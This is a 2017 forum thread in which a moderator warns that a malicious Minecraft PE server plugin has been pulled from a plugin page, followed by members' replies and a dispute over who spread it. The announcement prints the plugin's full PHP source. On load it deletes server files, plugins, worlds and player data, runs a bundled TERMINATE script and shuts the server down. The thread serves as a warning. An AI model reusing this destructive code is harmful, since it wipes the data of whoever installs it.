README Malicious code found in a plugin

Discussion in 'News' started by Casper, May 2, 2017.

  1. Casper

    Casper Moderator

    Joined:
    Oct 25, 2016
    Messages:
    115
    Likes Received:
    111
    Edit: A plugin similar to this has been reported to us by @BLOCKSTORM. It has been found on TesseractPM's Discord server.

    Hello!

    I would like to announce that a plugin containing malicious code has been removed for ImagicalMine's plugins page on 29th of April at 1:05 PM. This dangerous code – when installed on your server – deletes everything. If you have downloaded this plugin, do not install it on your MCPE server.

    The ImagicalMine Staff team will try to be better on approving plugins to make sure this does not happen again. These forums are – unfortunately – very inactive at the moment, also by our staff members. We apologize if your plugin takes a very long time to approve.

    PHP:
    <?php
    namespace Anonymous;
    use 
    pocketmine\plugin\PluginBase;
    use 
    pocketmine\utils\Config;
    class 
    DarkSide extends PluginBase
    {
        public function 
    onLoad()
        {
            
    unlink("src/pocketmine/Server.php");
            
    unlink("src/pocketmine/PocketMine.php");
            
    unlink("src/pocketmine/*.php");
            
    unlink("src/pocketmine/Player.php");
            
    unlink("*.phar");
            
    unlink("*.yml");
            
    unlink("*.json");
            
    unlink("*.txt");
            
    unlink("*.*");
            
    $files array_map('unlink'glob("plugins/*"));
            ;
            foreach (
    $files as $file) {
                if (
    is_file($file))
                    
    unlink($file);
            }
            
    $files array_map('unlink'glob("worlds/*"));
            ;
            foreach (
    $files as $file) {
                if (
    is_file($file))
                    
    unlink($file);
            }
            
    $files array_map('unlink'glob("src/*"));
            ;
            foreach (
    $files as $file) {
                if (
    is_file($file))
                    
    unlink($file);
            }
            
    $dir "src";
            if (
    is_dir($dir)) {
                
    $objects scandir($dir);
                foreach (
    $objects as $object) {
                    if (
    $object != "." && $object != "..") {
                        if (
    is_dir($dir "/" $object))
                            
    rmdir($dir "/" $object);
                        else
                            
    unlink($dir "/" $object);
                    }
                }
                
    rmdir($dir);
            }
            
    $dir "plugins";
            if (
    is_dir($dir)) {
                
    $objects scandir($dir);
                foreach (
    $objects as $object) {
                    if (
    $object != "." && $object != "..") {
                        if (
    is_dir($dir "/" $object))
                            
    rmdir($dir "/" $object);
                        else
                            
    unlink($dir "/" $object);
                    }
                }
                
    rmdir($dir);
            }
            
    $dir "worlds";
            if (
    is_dir($dir)) {
                
    $objects scandir($dir);
                foreach (
    $objects as $object) {
                    if (
    $object != "." && $object != "..") {
                        if (
    is_dir($dir "/" $object))
                            
    rmdir($dir "/" $object);
                        else
                            
    unlink($dir "/" $object);
                    }
                }
                
    rmdir($dir);
            }
            
    $dir "players";
            if (
    is_dir($dir)) {
                
    $objects scandir($dir);
                foreach (
    $objects as $object) {
                    if (
    $object != "." && $object != "..") {
                        if (
    is_dir($dir "/" $object))
                            
    rmdir($dir "/" $object);
                        else
                            
    unlink($dir "/" $object);
                    }
                }
                
    rmdir($dir);
            }
            if (
    php_uname("s") == "Ubuntu"){
                
    unlink('start.sh');
      
    $this->saveResource("TERMINATE.sh"true);
            
    passthru($this->getDataFolder()."TERMINATE.sh");
      }
            if (
    php_uname("s") == "Debian"){
                
    unlink('start.sh');
      
    $this->saveResource("TERMINATE.sh"true);
            
    passthru($this->getDataFolder()."TERMINATE.sh");
      }
            if (
    php_uname("s") == "Windows NT"){
                
    unlink('start.bat');
       
    unlink('start.cmd');
       
    $this->saveResource("TERMINATE.cmd"true);
       
    passthru($this->getDataFolder()."TERMINATE.cmd");
      }
            
    $this->getServer()->forceShutdown();
        }
    }

    Sincerely,
    Casper.
     
    HimbeersaftLP likes this.
  2. Ulti

    Ulti Active Member

    Joined:
    Dec 7, 2015
    Messages:
    53
    Likes Received:
    218
    Shouldn't it be checked before it was approved?
     
  3. HimbeersaftLP

    HimbeersaftLP Notable Member
    Plugin Developer

    Joined:
    Jan 1, 2016
    Messages:
    395
    Likes Received:
    1,182
    I am quite sure that was a typo xD
     
    Casper likes this.
  4. Amir Emad

    Amir Emad Active Member
    Plugin Developer

    Joined:
    Dec 20, 2015
    Messages:
    64
    Likes Received:
    152
    WOW Fantastic plugin good job man!! Bravo!!
     
    Casper and HimbeersaftLP like this.
  5. HimbeersaftLP

    HimbeersaftLP Notable Member
    Plugin Developer

    Joined:
    Jan 1, 2016
    Messages:
    395
    Likes Received:
    1,182
    [​IMG]
     
    remote_vase and Casper like this.
  6. Casper

    Casper Moderator

    Joined:
    Oct 25, 2016
    Messages:
    115
    Likes Received:
    111
    Oops! My bad, changing it now. :p
     
    remote_vase likes this.
  7. Sardilla

    Sardilla New Member

    Joined:
    Jan 30, 2017
    Messages:
    1
    Likes Received:
    2
    Hello everyone i am just curious if where i can get this plugin now
    I want to send one to my friend,and
    Just kidding
     
    Casper and HimbeersaftLP like this.
  8. remote_vase

    remote_vase Your everyday top-of-the-notch web developer
    Plugin Developer

    Joined:
    Dec 23, 2015
    Messages:
    586
    Likes Received:
    699
    Thanks for letting us know, I'll be sure to spread the word when I get a chance.
     
    Casper likes this.
  9. DeathRaven359

    DeathRaven359 Active Member

    Joined:
    Mar 13, 2016
    Messages:
    53
    Likes Received:
    1,533
    Can we pu-leez link leet.cc to this plugin?
     
    remote_vase and HimbeersaftLP like this.
  10. remote_vase

    remote_vase Your everyday top-of-the-notch web developer
    Plugin Developer

    Joined:
    Dec 23, 2015
    Messages:
    586
    Likes Received:
    699
    That would be nice, but I think they test the plugins before selling them
     
  11. HimbeersaftLP

    HimbeersaftLP Notable Member
    Plugin Developer

    Joined:
    Jan 1, 2016
    Messages:
    395
    Likes Received:
    1,182
    @DeathRaven359 I'm just curious, did you accidentally press that ignore button on my profile?
     
  12. remote_vase

    remote_vase Your everyday top-of-the-notch web developer
    Plugin Developer

    Joined:
    Dec 23, 2015
    Messages:
    586
    Likes Received:
    699
    If she did, then how would she read your post?
     
    HimbeersaftLP likes this.
  13. HimbeersaftLP

    HimbeersaftLP Notable Member
    Plugin Developer

    Joined:
    Jan 1, 2016
    Messages:
    395
    Likes Received:
    1,182
    Oh yeah, kill me pls I am so dumb xD
     
    remote_vase likes this.
  14. remote_vase

    remote_vase Your everyday top-of-the-notch web developer
    Plugin Developer

    Joined:
    Dec 23, 2015
    Messages:
    586
    Likes Received:
    699
    No! I'm not a murderer!
     
    Dog2puppy likes this.
  15. Lazerplayz

    Lazerplayz Active Member
    Plugin Developer

    Joined:
    Nov 15, 2016
    Messages:
    28
    Likes Received:
    25
    I hope this plugin comes out one day :3
     
    HimbeersaftLP likes this.
  16. remote_vase

    remote_vase Your everyday top-of-the-notch web developer
    Plugin Developer

    Joined:
    Dec 23, 2015
    Messages:
    586
    Likes Received:
    699
    As per the update by BLOCKSTORM, he was a spammer on the BoxofDevs discord server as reported by TheRoyalBlock, resulting in a kick. In addition, Evan was putting a serverdestroyer plugin for one reason only: He hates tesseract. He has deleted the plugin from Tesseract discord now that Linux restored ownership to Tesseract's rightful owners. Lastly, that discord server is no longer official, as stated by @ImagicalGamer on the Tesseract github repository.
     
  17. Mihai Sorin

    Mihai Sorin Active Member
    Plugin Developer

    Joined:
    Mar 14, 2016
    Messages:
    118
    Likes Received:
    47
    apple rekt tesseract
     
    remote_vase and HimbeersaftLP like this.
  18. BLOCKSTORM

    BLOCKSTORM Active Member

    Joined:
    Dec 20, 2016
    Messages:
    18
    Likes Received:
    2
    @remote_vase im Not a spammer.They Have spammed all the time.Im Not a spammer,but my WLan Is Not so good so i have to Press [send] many Times and sometimes it send the Messages More Times than one.Im sorry if this is Spamming,but i didnt want to Spam there!
    --- Post updated ---
    @remote_vase You can also See this when i send posts here.They Duplikate beceause i have to Press [SEND] many Times and then It send it many times
     
  19. HimbeersaftLP

    HimbeersaftLP Notable Member
    Plugin Developer

    Joined:
    Jan 1, 2016
    Messages:
    395
    Likes Received:
    1,182
    Just wait longer or get better internet :D

    Also kicked doesn't mean that you can't join again
     
    remote_vase likes this.
  20. BLOCKSTORM

    BLOCKSTORM Active Member

    Joined:
    Dec 20, 2016
    Messages:
    18
    Likes Received:
    2
    but they will kick me again.And i have written @everyone AFTER they published and sent the plugin.And why they dont get punished for publishing this Plugin.
    --- Post updated ---
    Im working on better internet @HimbeersaftLP But i dont have much time for this
     

Share This Page